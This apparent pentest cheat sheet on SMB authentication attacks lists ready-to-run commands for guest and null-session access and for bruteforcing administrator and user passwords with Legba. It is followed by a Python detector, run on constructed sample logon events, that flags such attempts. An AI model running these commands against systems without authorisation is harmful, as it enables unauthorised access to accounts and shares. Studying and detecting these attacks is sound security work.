
SMB Authentication Attacks

Guest or Anonymous Access to Shares

Sometimes it's possible to authenticate to SMB successfully without knowing any credentials. This could lead to RCE. Try to authenticate to the guest account.

Attempt guest account authentication

smbclient -U Guest IP
nxc smb IP -u "somenonexistentaccount" -p "" --shares

Try to authenticate using a null session

nxc smb IP -u '' -p '' --users

Bruteforcing SMB with Legba

Get a shell inside the Legba Docker container

docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest

Bruteforce administrator password

legba smb --smb-workgroup nd.lab --smb-share "C$" --username administrator --password /data/passwords.txt --target IP

Bruteforce a specific user's password

legba smb --smb-workgroup nd.lab --smb-share "SharedFiles" --username oscar --password /data/passwords.txt --target IP
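
What the guest, null-session and bruteforce attempts above look like from the target's logon events, as an added detection example that is not part of the original page. It assumes Windows Security events 4624/4625 have already been exported as dicts with the keys shown; the helper names, the sample events, the threshold and the window are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

GUEST_NAMES = {"guest", "anonymous logon"}  # accounts used by guest / null sessions


def ev(ts, event_id, user, ip, logon_type=3):
    """Build one constructed event; keys mirror Windows 4624/4625 event data."""
    return {"TimeCreated": ts, "EventID": event_id, "LogonType": logon_type,
            "TargetUserName": user, "IpAddress": ip}


def sample_events():
    """Constructed sample data, not taken from a real host."""
    events = [
        ev("2024-05-01T10:00:00", 4624, "ANONYMOUS LOGON", "10.0.0.50"),
        ev("2024-05-01T10:00:05", 4624, "Guest", "10.0.0.50"),
        ev("2024-05-01T10:00:30", 4625, "oscar", "10.0.0.7"),
        ev("2024-05-01T10:00:40", 4625, "oscar", "10.0.0.7"),
        ev("2024-05-01T10:00:50", 4625, "administrator", "127.0.0.1", logon_type=2),
    ]
    # Six failed network logons for one account within ten seconds.
    events += [ev(f"2024-05-01T10:01:{s:02d}", 4625, "administrator", "10.0.0.50")
               for s in range(0, 12, 2)]
    return events


def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Return (finding, source_ip, account) tuples in chronological order."""
    findings, flagged = [], set()
    failures = defaultdict(list)  # (ip, account) -> recent failure timestamps
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        if e["LogonType"] != 3:  # 3 = network logon, the type SMB produces
            continue
        ts = datetime.fromisoformat(e["TimeCreated"])
        user, ip = e["TargetUserName"], e["IpAddress"]
        if e["EventID"] == 4624 and user.lower() in GUEST_NAMES:
            findings.append(("guest_or_null_session", ip, user))
        elif e["EventID"] == 4625:  # failed logon
            key = (ip, user.lower())
            times = failures[key]
            times.append(ts)
            while ts - times[0] > window:  # drop failures outside the window
                times.pop(0)
            if len(times) >= threshold and key not in flagged:
                flagged.add(key)
                findings.append(("password_bruteforce", ip, user))
    return findings


if __name__ == "__main__":
    for finding in detect(sample_events()):
        print(finding)
```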